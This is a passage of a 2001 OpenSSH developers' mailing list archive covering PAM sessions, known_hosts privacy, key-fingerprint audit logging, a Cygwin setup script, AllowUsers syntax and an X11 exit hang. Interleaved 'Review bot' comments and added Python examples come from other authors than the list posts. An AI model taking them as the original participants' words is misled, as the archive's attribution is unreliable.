Linux i386 Only configuration changes on server: Protocol 2 (only) BatchMode yes Port 19635 (some random other port) ------------------ <> -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: sshdata2.txt Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010611/796478c0/attachment.txt From abartlet at pcug.org.au Tue Jun 12 15:29:44 2001 From: abartlet at pcug.org.au (Andrew Bartlett) Date: Tue, 12 Jun 2001 15:29:44 +1000 Subject: [PATCH] Run PAM sessions for all logins, not just ptys Message-ID: <3B25A8C8.501A3C0D@bartlett.house> This patch restores the behaviour of previous releases of OpenSSH and does a PAM session check for every login/logout, not just logins requesting a PTY. Mildly tested under RedHat 6.2. Andrew Bartlett -- Andrew Bartlett abartlet at pcug.org.au -------------- next part -------------- diff -ur openssh-2.9p1old/session.c openssh-2.9p1/session.c --- openssh-2.9p1old/session.c Thu Apr 19 01:29:34 2001 +++ openssh-2.9p1/session.c Sun May 6 22:27:53 2001 @@ -496,6 +496,7 @@ session_proctitle(s); #if defined(USE_PAM) + do_pam_session(s->pw->pw_name, NULL); do_pam_setcred(1); #endif /* USE_PAM */ Only in openssh-2.9p1: session.c.old Only in openssh-2.9p1: session.c~ From mstone at cs.loyola.edu Wed Jun 13 02:16:43 2001 From: mstone at cs.loyola.edu (Michael Stone) Date: Tue, 12 Jun 2001 12:16:43 -0400 Subject: small patch to session.c Message-ID: <20010612121643.J15731@justice.loyola.edu> In the following code snippit from session.c: void session_close_by_pid(pid_t pid, int status) { Session *s = session_by_pid(pid); if (s == NULL) { debug("session_close_by_pid: no session for pid %d", s->pid); return; } if (s->chanid != -1) session_exit_message(s, status); session_close(s); } the reference to s->pid in the debug statement should probably just be pid. -- Mike Stone From qralston+ml.openssh-unix-dev at andrew.cmu.edu Wed Jun 13 05:55:25 2001 
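Review bot: the session.c hunk adds do_pam_session() unconditionally ahead of do_pam_setcred(1), yet the cover note says the PTY path already performed the PAM session check and the diff removes nothing, so logins that request a PTY may now open the PAM session twice, the second time with a NULL tty argument. Either drop the PTY-path call or guard this one with the no-PTY case, and show the matching session close at logout, which the patch mentions but the hunk does not include. The trailing `Only in openssh-2.9p1: session.c.old` and `session.c~` lines mean the diff was taken against a tree containing editor backups; regenerate it without them so it applies cleanly.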
From: qralston+ml.openssh-unix-dev at andrew.cmu.edu (James Ralston) Date: Tue, 12 Jun 2001 15:55:25 -0400 (EDT) Subject: authorized_keys2 directory idea In-Reply-To: <20010609142739.A29124@folly> Message-ID: On Sat, 9 Jun 2001, Gert Doering wrote: > Now for known_hosts, I tend to disagree - I don't see any compelling > reason to exclude hosts from that list. An individual user's known_hosts file is implicitly prefixed with the following comment: # # Hi there, system cracker! This is my known_hosts file. This # file lists all the machines I connect to on a regular basis. # So, if you've broken into this machine and are reading this # file, do yourself a favor, and target these machines first. # Granted, if you're good, you'll figure this out anyway, but why # waste the effort when I've conveniently collected all this # information right here for you? An IDS might be on your tail # already, so you better get cracking (no pun intended). # Even worse is the case of maintaining the same known_hosts file on both sides of a firewall. If the DNS for the domain is configured to not return information about internal hosts to external requestors (which is often a reasonable thing to do), then by dragging information about external hosts outside the firewall, you've given a potential attacker information that might otherwise be quite difficult to gather. (This is particularly true if you use "CheckHostIP yes", which is OpenSSH's default unless explicitly overridden--if that's the case, not only have you revealed the names of internal hosts to a potential attacker, but you've revealed their IP addresses as well.) Gert continued: > So what we do is just "collect all host keys on one central machine, > and distribute the complete file from there". I wish I were in your shoes--that all of my access patterns involved one tidy centralized domain, and that I could just rely on a single global known_hosts file.
But the world is not an ideal place, and my particular world is nowhere near that simple. My activities involve multiple machines across multiple domains. However, due to geographical locations and firewalls, it is *not* the case that I need to be able to log in from every single machine to every other machine. The actual access patterns I require are quite small. Therefore, the contents of my known_hosts files are a minimal set for each machine. That way, if one of the boxes I use were to be cracked, I've reduced the information that the attacker would start with. The additional time this would buy might be the difference between intercepting and isolating the attack, and having the attacker successfully continue the attack through to other hosts. Gert continued: > With the keys, it's not that easy, as not everybody has access > everywhere. Replace "keys" with "known_hosts", and I'd wager your statement is still true for many people. (As I've illustrated, it's certainly still true for me.) On Sat, 9 Jun 2001, Markus Friedl wrote: > for known_hosts you have to scan your net and build a single file of > trusted hosts that can be distributed to all client machines. One doesn't "have to" do anything of the sort. I don't maintain my personal known_hosts file that way, as I've illustrated above. (Even if I *wanted* to do it that way, I couldn't; I have hosts from multiple different domains in my known_hosts file.) Markus continued: > you have to check this file for key changes. > checking for new files is much harder than > $ diff a b You're assuming that all users of OpenSSH have a single known_hosts file that is byte-for-byte identical to a single global collected host keys file for a single domain. This assumption is false. Let's say that I have 3 sets of collected host keys, each set containing hosts from a separate and unique domain. Let's call these sets {a}, {b}, and {c}.
My personal known_hosts file is set {k}, where {k} is a subset of the union of {a}, {b}, and {c}, and the intersections of {k} with each of {a}, {b}, and {c} are all non-empty sets. In the above scenario, you cannot check for key changes by using a diff command. If the host keys were stored as single files, you could easily check for key changes by using rsync with the --existing option. Or, using a hybrid solution, if OpenSSH's algorithm would be to look for multiple keys in each file, and to continue searching until it either found a matching key or exhausted all files, you could create multiple files for each domain: ~/.ssh/known_hosts/foo.com ~/.ssh/known_hosts/bar.com ~/.ssh/known_hosts/podunk.edu Then, assuming you weren't maintaining subsets of each domain's global host keys files, you *could* actually use individual "diff" commands to check for changes... -- James Ralston, Information Technology Software Engineering Institute Carnegie Mellon University, Pittsburgh, PA, USA From rdawes at deloitte.co.za Wed Jun 13 16:48:10 2001
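The {k}-is-a-subset-of-{a}∪{b}∪{c} case James describes is exactly where `sort -u | diff` stops working, so here is the check done directly on the key entries. This is an added example for the thread, not OpenSSH code; it reads the two line formats the ssh-keyscan(1) patch earlier in this digest documents (`host-or-namelist keytype base64-encoded-key` and the rsa1 `host-or-namelist bits exponent modulus`) and treats the personal file as a subset, reporting only entries whose key differs from the collections or that no collection vouches for. The host names and key strings are constructed placeholders.

```python
"""Key-change check for a personal known_hosts file that draws on several
per-domain host key collections (the {k} subset of {a}, {b}, {c} case).

Added example for this discussion, not OpenSSH code.  Entries use the line
formats the ssh-keyscan(1) patch on this page documents:
"host-or-namelist keytype base64-encoded-key" for protocol 2 keys and
"host-or-namelist bits exponent modulus" for rsa1 keys.  Host names and
key material below are constructed sample data.
"""


def parse_hostkeys(text):
    """Map (hostname, keytype) -> key for every name in each namelist.

    A namelist is a comma-separated list of names/addresses of one host, so
    "a.foo.com,a ssh-rsa AAAA" yields two entries.  rsa1 lines have four
    fields and are keyed with the pseudo-type 'rsa1'.
    """
    keys = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        fields = line.split()
        if len(fields) == 3:
            namelist, keytype, key = fields
        elif len(fields) == 4:
            namelist, keytype, key = fields[0], 'rsa1', ' '.join(fields[1:])
        else:
            continue  # malformed line: ignore rather than guess
        for name in namelist.split(','):
            keys[(name, keytype)] = key
    return keys


def check_known_hosts(known_hosts_text, collections):
    """Compare a known_hosts file with the union of several collections.

    Unlike `diff`, hosts that appear only in a collection are not reported:
    the personal file is expected to be a subset.  Returns two sorted lists:
    'changed' (same host and type, different key: investigate before the
    next connection) and 'not_in_collections' (no collection vouches for it).
    """
    mine = parse_hostkeys(known_hosts_text)
    reference = {}
    for text in collections:
        reference.update(parse_hostkeys(text))
    changed, unknown = [], []
    for (host, keytype), key in sorted(mine.items()):
        ref = reference.get((host, keytype))
        if ref is None:
            unknown.append((host, keytype))
        elif ref != key:
            changed.append((host, keytype))
    return {'changed': changed, 'not_in_collections': unknown}


# Constructed sample data: three per-domain collections, as ssh-keyscan
# would produce them, and a personal known_hosts that takes a few hosts
# from each.  The key strings are placeholders, not real keys.
COLLECTED_FOO = """alpha.foo.com,alpha ssh-rsa AAAAB3foo1
beta.foo.com ssh-dss AAAAB3foo2
"""
COLLECTED_BAR = """gamma.bar.com ssh-rsa AAAAB3bar1
delta.bar.com ssh-rsa AAAAB3bar2
"""
COLLECTED_PODUNK = """www.podunk.edu ssh-rsa AAAAB3pod1
mail.podunk.edu 1024 35 1234567890123
"""
KNOWN_HOSTS = """alpha.foo.com ssh-rsa AAAAB3foo1
gamma.bar.com ssh-rsa AAAAB3bar1OLD
mail.podunk.edu 1024 35 1234567890123
legacy.example.net ssh-rsa AAAAB3xyz
"""


def sample_report():
    """Run the check on the constructed data (used by main and the tests)."""
    return check_known_hosts(KNOWN_HOSTS,
                             [COLLECTED_FOO, COLLECTED_BAR, COLLECTED_PODUNK])


if __name__ == '__main__':
    result = sample_report()
    for host, keytype in result['changed']:
        print('CHANGED  %s (%s)' % (host, keytype))
    for host, keytype in result['not_in_collections']:
        print('UNKNOWN  %s (%s)' % (host, keytype))
```

Feed it the real files (`open(path).read()`) and the per-domain ssh-keyscan outputs; a CHANGED line is the host-key-changed warning you would otherwise only see at connect time, and UNKNOWN lines are candidates for removal from the personal file.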
From: rdawes at deloitte.co.za (Dawes, Rogan (ZA - Johannesburg)) Date: Wed, 13 Jun 2001 08:48:10 +0200 Subject: Logging of RSA/DSA key used? Message-ID: <98A3855A9087D411952F00508B61BD4001EE2F21@ZAJNBNT006> Hi folks, I am sitting with a requirement to configure an account for shared use, with access via SSH, and RSA/DSA keys. What I would like to do, and I know it is not foolproof, is log the key presented in order to log on, for audit purposes. The intention is that each user has their own key pair, and the public keys are all stored on the server, as expected. When the key presented is accepted, simply log the key fingerprint, or the key itself to syslog. I have experimented a little with the available log levels, and saw an entry at VERBOSE level which is almost what I am looking for: Key found in /home/rdawes/.ssh/authorized_keys2, line 2 (or words to that effect) This level of logging is not recommended, as per the man page, and indeed, generates a lot of unnecessary info for my purposes. Would it be possible to add a log entry at INFO (preferably) or VERBOSE levels that would record a fingerprint of the public key matched? I understand that one needs to be careful of blindly logging user data to syslog, and don't really want the Key comment field anyway, but once one has verified that the key matches, I doubt that there can be any bad info in the key field itself, surely? Please Cc: me on any replies, as I am not subscribed to the list. Thanks Rogan -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe -- Tel: +27(11)806-6216 Fax: +27(11)806-5202 Cell: +27(82)784-9498 -- NOTE: This e-mail message and its attachments are subject to the disclaimers as published at: http://www.deloitte.co.za/disc.htm#emaildisc From vinschen at redhat.com Thu Jun 14 01:00:24 2001
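To make concrete what Rogan is asking for, the following is an added example, not sshd code: it models the authorized_keys2 lookup behind the "Key found in ..., line N" message and builds an audit line that carries the matched key's fingerprint and line number rather than the user-controlled comment field. The MD5 colon-hex fingerprint is the form ssh-keygen -l printed at the time; the SHA256 form is what modern OpenSSH prints. The RSA parameters are constructed toys that only exercise the wire encoding (they are not usable keys), and the `from=`/`command=` options prefix of authorized_keys lines is deliberately not parsed.

```python
"""Audit-style logging of the authorized_keys entry that matched.

Added example for the request above, not sshd's code.  It models the
lookup behind sshd's "Key found in .../authorized_keys2, line N" message
and builds an INFO-level line carrying the matched key's fingerprint
rather than the user-controlled comment field.  The MD5 colon-hex form is
what ssh-keygen -l printed at the time; SHA256 is the modern form.  The
RSA parameters below are constructed toys that only exercise the wire
encoding, not usable keys.
"""
import base64
import hashlib
import struct


def ssh_string(data):
    """RFC 4251 string: 4-byte big-endian length, then the bytes."""
    return struct.pack('>I', len(data)) + data


def ssh_mpint(n):
    """RFC 4251 mpint for n >= 0: big-endian, with a leading zero byte
    whenever the top bit of the first byte would otherwise be set."""
    return ssh_string(n.to_bytes((n.bit_length() + 8) // 8, 'big'))


def rsa_blob(e, n):
    """ssh-rsa public key blob: string "ssh-rsa", mpint e, mpint n."""
    return ssh_string(b'ssh-rsa') + ssh_mpint(e) + ssh_mpint(n)


def fingerprint_md5(blob):
    return ':'.join('%02x' % b for b in hashlib.md5(blob).digest())


def fingerprint_sha256(blob):
    digest = hashlib.sha256(blob).digest()
    return 'SHA256:' + base64.b64encode(digest).decode('ascii').rstrip('=')


def parse_authorized_keys(text):
    """Yield (lineno, keytype, decoded blob, comment) per key line.
    Assumption: plain "keytype base64 [comment]" lines; the optional
    options prefix (from=, command=, ...) is not handled here."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        fields = raw.strip().split(None, 2)
        if len(fields) < 2 or fields[0].startswith('#'):
            continue
        try:
            blob = base64.b64decode(fields[1], validate=True)
        except ValueError:      # binascii.Error is a ValueError
            continue            # an unparsable entry can never match
        yield lineno, fields[0], blob, fields[2] if len(fields) == 3 else ''


def find_key(authorized_text, presented_blob):
    """(lineno, keytype) of the entry whose decoded blob equals the key the
    client proved possession of, or None.  Comparing decoded bytes avoids
    false mismatches from whitespace or padding differences."""
    for lineno, keytype, blob, _comment in parse_authorized_keys(authorized_text):
        if blob == presented_blob:
            return lineno, keytype
    return None


def audit_line(user, remote_addr, authorized_text, presented_blob):
    """Log line built only from verified, server-derived values."""
    fp = fingerprint_md5(presented_blob)
    hit = find_key(authorized_text, presented_blob)
    if hit is None:
        return 'Failed publickey for %s from %s: %s not in authorized_keys2' % (
            user, remote_addr, fp)
    lineno, keytype = hit
    return 'Accepted publickey for %s from %s: %s key %s (authorized_keys2 line %d)' % (
        user, remote_addr, keytype, fp, lineno)


# Constructed toy keys (tiny moduli) and a two-key authorized_keys2 file.
ALICE_BLOB = rsa_blob(65537, 0xC0FFEE0123456789ABCDEF)
BOB_BLOB = rsa_blob(65537, 0xBADC0DE9876543210FEDCBA)
AUTHORIZED_KEYS2 = '# shared account\nssh-rsa %s alice@workstation\nssh-rsa %s bob@laptop\n' % (
    base64.b64encode(ALICE_BLOB).decode('ascii'),
    base64.b64encode(BOB_BLOB).decode('ascii'))

if __name__ == '__main__':
    print(audit_line('shared', '10.0.0.5', AUTHORIZED_KEYS2, BOB_BLOB))
```

The fingerprint is computed over the decoded key blob, so it is stable regardless of how the line was formatted, and mapping it back to a person is done offline against the key inventory rather than by trusting the comment in the file.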
From: vinschen at redhat.com (Corinna Vinschen) Date: Wed, 13 Jun 2001 17:00:24 +0200 Subject: [PATCH]: Add features to Cygwin's ssh-host-config script Message-ID: <20010613170024.N1144@cygbert.vinschen.de> Hi, I have added two features to the ssh-host-config script which is used in Cygwin installations to prepare the host based OpenSSH configuration. Now it cares for a /var/log/lastlog file if it's not already installed (Thanks to "Karl M" for that patch) and it now asks the user if s/he wants to install sshd as a NT service and, if so, installs it. Index: ssh-host-config =================================================================== RCS file: /cvs/openssh_cvs/contrib/cygwin/ssh-host-config,v retrieving revision 1.2 diff -u -p -r1.2 ssh-host-config --- ssh-host-config 2001/03/07 10:38:19 1.2 +++ ssh-host-config 2001/06/13 14:54:31 
@@ -438,6 +438,48 @@ then fi fi +# Create /var/log and /var/log/lastlog if not already existing + +if [ -f /var/log ] +then + echo "Creating /var/log failed\!" +else + if [ ! -d /var/log ] + then + mkdir /var/log + fi + if [ -d /var/log/lastlog ] + then + echo "Creating /var/log/lastlog failed\!" + elif [ ! -f /var/log/lastlog ] + then + cat /dev/null > /var/log/lastlog + fi +fi + +# On NT ask if sshd should be installed as service +if [ $_nt -gt 0 ] +then + echo + echo "Do you want to install sshd as service?" + if request "(Say \"no\" if it's already installed as service)" + then + echo + echo "Which value should the environment variable CYGWIN have when" + echo "sshd starts? It's recommended to set at least \"ntsec\" to be" + echo "able to change user context without password." + echo -n "Default is \"binmode ntsec tty\". CYGWIN=" + read _cygwin + [ -z "${_cygwin}" ] && _cygwin="binmode ntsec tty" + if cygrunsrv -I sshd -d "CYGWIN sshd" -p /usr/sbin/sshd -a -D -e "CYGWIN=${_cygwin}" + then + chown system /etc/ssh* + echo + echo "The service has been installed under LocalSystem account." + fi + fi +fi + if [ "${old_install}" = "1" ] then echo Thanks, Corinna -- Corinna Vinschen Cygwin Developer Red Hat, Inc. mailto:vinschen at redhat.com From june01 at stokes.ca Thu Jun 14 07:04:18 2001 
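Review bot: in the new /var/log block, `if [ -f /var/log ] then echo "Creating /var/log failed\!"` reports a failure before anything was attempted; the condition is that /var/log already exists as a regular file, so say that, and the same applies to the `[ -d /var/log/lastlog ]` branch. `mkdir /var/log` and `cat /dev/null > /var/log/lastlog` run unchecked, so the script carries on to the service install even when the lastlog file could not be created; test their exit status (or the file afterwards) before continuing. Inside double quotes a non-interactive bash keeps the backslash of `\!`, so the messages print a stray backslash; plain `failed!` is enough in a script. In the service block the `chown system /etc/ssh*` after a successful cygrunsrv is likewise unchecked, and since the service runs as LocalSystem it is worth saying in the prompt that the recommended `ntsec` setting is what lets sshd switch user context, as the text already hints.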
From: june01 at stokes.ca (Allan Stokes) Date: Wed, 13 Jun 2001 14:04:18 -0700 Subject: user@host in AllowUsers Message-ID: I have a number of development machines behind my OpenBSD firewall which all provide a very permissive development account (and easy sudo). I don't want this account exposed on the internet side of the firewall, so I created a doorstep account with no perms and really long passwords to get anywhere useful. I looked through the SSH book and it gave me the impression that I could set up these rules:
AllowUsers wiz@*.myhouse.nat
AllowUsers doorstep@*
But when I tested it was clear that OpenSSH 2.9 doesn't support this syntax. Then I searched this list and I found a post from June 4 by Andrew Tridgell supplying a patch to provide exactly this functionality. Actually I initially thought there might be an ipf-like syntax:
AllowUsers wiz@xl0
The other option is to run different instances of sshd bound to different interfaces, with different config files. I'd rather not. Andrew's patch would do the job just fine. I hope it gets incorporated, especially since the SSH book implies that this kind of access control is possible. Allan From pekkas at netcore.fi Thu Jun 14 07:16:46 2001
From: pekkas at netcore.fi (Pekka Savola) Date: Thu, 14 Jun 2001 00:16:46 +0300 (EEST) Subject: user@host in AllowUsers In-Reply-To: Message-ID: On Wed, 13 Jun 2001, Allan Stokes wrote: > Andrew's patch would do the job just fine. I hope it gets incorporated, > especially since the SSH book implies that this kind of access control is > possible. This has been a feature of SSH.COM's sshd for a long time, and this is what the book is probably referring to. Basically methods to control connecting hosts in sshd_config have been removed from OpenSSH because most of these features are provided by tcp_wrappers. Default tcp_wrappers can't handle the situation you're describing, or one where you want to use wildcards in all possible places in hostname definitions. There has been some debate on this in the past, but Markus et al haven't seen the need for this. Perhaps user@host control would be a "killer-application" in this regard? -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From acox at ia.primustel.com Thu Jun 14 07:30:06 2001
From: acox at ia.primustel.com (Aran Cox) Date: Wed, 13 Jun 2001 16:30:06 -0500 Subject: 2.9p1 SCO OS 5.0.5 server and Linux client hang on exit when using X11 forwarding and protocol 2 Message-ID: <20010613163006.A1374@benway.cv.telegroup.com> When I run this command: ssh -1 -v -n -l root njdb1b /usr/bin/X11/xterm -sb -sl 1000 -T njdb1b -e find /etc An xterm appears on my screen, the contents of /etc scroll by and then ssh exits. When I invoke the same command with the -2 option, the xterm appears (and disappears) but ssh never exits. netstat says the (ssh) connection is still established but the xterm is no longer running. I'll include the output as attachments. Any idea as to what is going on? The client is RedHat 7.1 using RPMS from the openbsd.com ftp site. The server is SCO OpenServer 5.0.5 built with the SCO development environment. I configured with : export CCFLAGS='-L/usr/local/lib -I/usr/local/include' ./configure --sysconfdir=/etc/ssh --with-rsh=/usr/bin/rcmd --exec-prefix=/usr Thanks, Aran -------------- next part -------------- OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090600f debug1: Reading configuration data /home/spin/.ssh/config debug1: Applying options for * debug1: Applying options for njdb* debug1: Reading configuration data /etc/ssh/ssh_config debug1: Applying options for * debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 1000 geteuid 0 anon 1 debug1: Connecting to njdb1b [X.X.X.X] port 22. debug1: temporarily_use_uid: 1000/100 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 1000/100 (e=0) debug1: restore_uid debug1: Connection established. 
debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /home/spin/.ssh/identity type 0 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 debug1: match: OpenSSH_2.9p1 pat ^OpenSSH debug1: Local version string SSH-1.5-OpenSSH_2.9p1 debug1: Waiting for server public key. debug1: Received server public key (768 bits) and host key (1024 bits). debug1: Host 'njdb1b' is known and matches the RSA1 host key. debug1: Found key in /home/spin/.ssh/known_hosts:3 debug1: Encryption type: blowfish debug1: Sent encrypted session key. debug1: Installing crc compensation attack detector. debug1: Received encrypted confirmation. debug1: Trying RSA authentication via agent with 'spin at benway' debug1: Received RSA challenge from server. debug1: Sending response to RSA challenge. debug1: Remote: RSA authentication accepted. debug1: RSA authentication accepted by server. debug1: Requesting X11 forwarding with authentication spoofing. debug1: Requesting authentication agent forwarding. debug1: Sending command: /usr/bin/X11/xterm -sb -sl 1000 -T njdb1b -e find /etc debug1: Entering interactive session. debug1: Sending eof. debug1: Received X11 open request. 
debug1: fd 4 setting O_NONBLOCK debug1: fd 4 IS O_NONBLOCK debug1: channel 0: new [X11 connection from X.X.X.X port 1482] debug1: channel 0: rcvd ieof debug1: channel 0: output open -> drain debug1: channel 0: obuf empty debug1: channel 0: output drain -> closed debug1: channel 0: send oclose debug1: channel 0: close_write debug1: channel 0: read<=0 rfd 4 len 0 debug1: channel 0: read failed debug1: channel 0: input open -> drain debug1: channel 0: close_read debug1: channel 0: input: no drain shortcut debug1: channel 0: ibuf empty debug1: channel 0: input drain -> wait_oclose debug1: channel 0: send ieof debug1: channel 0: rcvd oclose debug1: channel 0: input wait_oclose -> closed debug1: channel 0: is dead debug1: channel_free: channel 0: status: The following connections are open: #0 X11 connection from X.X.X.X port 1482 (t4 r2 i8/0 o128/0 fd 4/4) Waiting for forwarded connections to terminate... The following connections are open: #2 X11 connection from X.X.X.X port 1482 (t4 r0 i4/0 o16/0 fd 8/8) debug1: Transferred: stdin 0, stdout 0, stderr 164 bytes in 1.7 seconds debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 96.3 debug1: Exit status 0 -------------- next part -------------- OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090600f debug1: Reading configuration data /home/spin/.ssh/config debug1: Applying options for * debug1: Applying options for njdb* debug1: Reading configuration data /etc/ssh/ssh_config debug1: Applying options for * debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 1000 geteuid 0 anon 1 debug1: Connecting to njdb1b [X.X.X.X] port 22. debug1: temporarily_use_uid: 1000/100 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 1000/100 (e=0) debug1: restore_uid debug1: Connection established. 
debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /home/spin/.ssh/id_rsa type 1 debug1: identity file /home/spin/.ssh/id_dsa type -1 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 debug1: match: OpenSSH_2.9p1 pat ^OpenSSH Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_2.9p1 debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug1: kex: server->client blowfish-cbc hmac-md5 none debug1: kex: client->server blowfish-cbc hmac-md5 none debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP debug1: dh_gen_key: priv key bits set: 139/256 debug1: bits set: 1040/2049 debug1: SSH2_MSG_KEX_DH_GEX_INIT sent debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY debug1: Host 'njdb1b' is known and matches the RSA host key. debug1: Found key in /home/spin/.ssh/known_hosts2:11 debug1: bits set: 1063/2049 debug1: ssh_rsa_verify: signature correct debug1: kex_derive_keys debug1: newkeys: mode 1 debug1: SSH2_MSG_NEWKEYS sent debug1: waiting for SSH2_MSG_NEWKEYS debug1: newkeys: mode 0 debug1: SSH2_MSG_NEWKEYS received debug1: done: ssh_kex2. debug1: send SSH2_MSG_SERVICE_REQUEST debug1: service_accept: ssh-userauth debug1: got SSH2_MSG_SERVICE_ACCEPT debug1: authentications that can continue: publickey,password,keyboard-interactive debug1: next auth method to try is publickey debug1: userauth_pubkey_agent: testing agent key /home/spin/.ssh/id_rsa debug1: input_userauth_pk_ok: pkalg ssh-rsa blen 149 lastkey 0x80920e0 hint -1 debug1: ssh-userauth2 successful: method publickey debug1: fd 4 setting O_NONBLOCK debug1: channel 0: new [client-session] debug1: channel_new: 0 debug1: send channel open 0 debug1: Entering interactive session. debug1: client_init id 0 arg 0 debug1: Requesting X11 forwarding with authentication spoofing. debug1: Requesting authentication agent forwarding. 
debug1: Sending command: /usr/bin/X11/xterm -sb -sl 1000 -T njdb1b -e find /etc debug1: channel 0: open confirm rwindow 0 rmax 16384 debug1: client_input_channel_open: ctype x11 rchan 3 win 4096 max 2048 debug1: client_request_x11: request from X.X.X.X 1485 debug1: fd 7 setting O_NONBLOCK debug1: fd 7 IS O_NONBLOCK debug1: channel 1: new [x11] debug1: confirm x11 debug1: channel 0: read<=0 rfd 4 len 0 debug1: channel 0: read failed debug1: channel 0: input open -> drain debug1: channel 0: close_read debug1: channel 0: input: no drain shortcut debug1: channel 0: ibuf empty debug1: channel 0: input drain -> closed debug1: channel 0: send eof debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 debug1: channel 0: rcvd eof debug1: channel 0: output open -> drain debug1: channel 0: rcvd close debug1: channel 1: rcvd eof debug1: channel 1: output open -> drain debug1: channel 0: obuf empty debug1: channel 0: output drain -> closed debug1: channel 0: close_write debug1: channel 0: send close debug1: channel 0: is dead debug1: channel_free: channel 0: status: The following connections are open: #0 client-session (t4 r0 i8/0 o128/0 fd -1/-1) #1 x11 (t4 r3 i1/0 o32/0 fd 7/7) debug1: channel_free: channel 0: dettaching channel user debug1: channel 1: obuf empty debug1: channel 1: output drain -> closed debug1: channel 1: close_write debug1: channel 1: read<=0 rfd 7 len 0 debug1: channel 1: read failed debug1: channel 1: input open -> drain debug1: channel 1: close_read debug1: channel 1: input: no drain shortcut debug1: channel 1: ibuf empty debug1: channel 1: input drain -> closed debug1: channel 1: send eof debug1: channel 1: send close debug1: channel 1: rcvd close debug1: channel 1: is dead debug1: channel_free: channel 1: status: The following connections are open: #1 x11 (t4 r3 i8/0 o128/0 fd 7/7) From jason at dour.org Thu Jun 14 21:58:14 2001 
From: jason at dour.org (Jason A . Dour) Date: Thu, 14 Jun 2001 07:58:14 -0400 Subject: SFTP Logging Message-ID: <20010614075814.A24420@dour.org> Hello everyone, Has there been any thought given to giving the SFTP subsystem better logging capabilities? We are looking to replace FTP, Telnet, and Rexec completely, but our FTP is presently logged and any replacement for it would also need to be logged. Specifically, we need to know about file uploads and downloads, deletions, et cetera. I've added some logging code to sftp-server.c, and would be happy to supply patches if it is of any interest at all. There obviously isn't much code to it, except for an extra function that parses pflags into a readable text string. Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ From markus.friedl at informatik.uni-erlangen.de Thu Jun 14 23:03:11 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 14 Jun 2001 15:03:11 +0200 Subject: user@host in AllowUsers In-Reply-To: ; from pekkas@netcore.fi on Thu, Jun 14, 2001 at 12:16:46AM +0300 References: Message-ID: <20010614150311.A31511@folly> On Thu, Jun 14, 2001 at 12:16:46AM +0300, Pekka Savola wrote: > On Wed, 13 Jun 2001, Allan Stokes wrote: > > Andrew's patch would do the job just fine. I hope it gets incorporated, > > especially since the SSH book implies that this kind of access control is > > possible. > > This has been a feature of SSH.COM's sshd for a long time, and this is > what the book is probably referring to. > > Basically methods to control connecting hosts in sshd_config have been > removed from OpenSSH because most of these features are provided by > tcp_wrappers. We never supported AllowUser user@host. If there is a patch that simplifies the current code, it's likely that it will be accepted. However, since the hang-on-exit bug is still not fixed, it's more important to fix the bugs than to add new features. From pekkas at netcore.fi Thu Jun 14 23:32:56 2001
From: pekkas at netcore.fi (Pekka Savola) Date: Thu, 14 Jun 2001 16:32:56 +0300 (EEST) Subject: user@host in AllowUsers In-Reply-To: <20010614150311.A31511@folly> Message-ID: On Thu, 14 Jun 2001, Markus Friedl wrote: > On Thu, Jun 14, 2001 at 12:16:46AM +0300, Pekka Savola wrote: > > On Wed, 13 Jun 2001, Allan Stokes wrote: > > > Andrew's patch would do the job just fine. I hope it gets incorporated, > > > especially since the SSH book implies that this kind of access control is > > > possible. > > > > This has been a feature of SSH.COM's sshd for a long time, and this is > > what the book is probably referring to. > > > > Basically methods to control connecting hosts in sshd_config have been > > removed from OpenSSH because most of these features are provided by > > tcp_wrappers. > > We never supported > AllowUser user@host Sorry, I meant "support was removed when OpenSSH was created from Ylönen's ssh-1.2.12". -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From allan at stokes.ca Fri Jun 15 00:42:54 2001
From: allan at stokes.ca (Allan Stokes) Date: Thu, 14 Jun 2001 07:42:54 -0700 Subject: user@host in AllowUsers Message-ID: > This has been a feature of SSH.COM's sshd for a long time, and this is > what the book is probably referring to. On page 6 the SSH book provides a secret decoder ring:
SSH - generic term
SSH-1 - the SSH protocol version 1
SSH-2 - the SSH protocol version 2
SSH1 - TY's ssh1
SSH2 - TY's ssh2
ssh - the client program (which is sometimes called ssh1 and ssh2)
OpenSSH - OpenSSH from the OpenBSD project
OpenSSH/1 - OpenSSH's behaviour wrt SSH-1
OpenSSH/2 - OpenSSH's behaviour wrt SSH-2
Section 5.5.2 gives examples of access control. I'll cite the examples attributed to OpenSSH which include wildcards, grouped by scope, ignoring examples which focus on Accept/Deny interaction.
# SSH1, SSH2, OpenSSH
AllowUsers ?mith
AllowUsers s*@*.edu # page 179
# SSH1, OpenBSD
AllowUsers smith jones cs*
AllowGroups ?aculty s*s
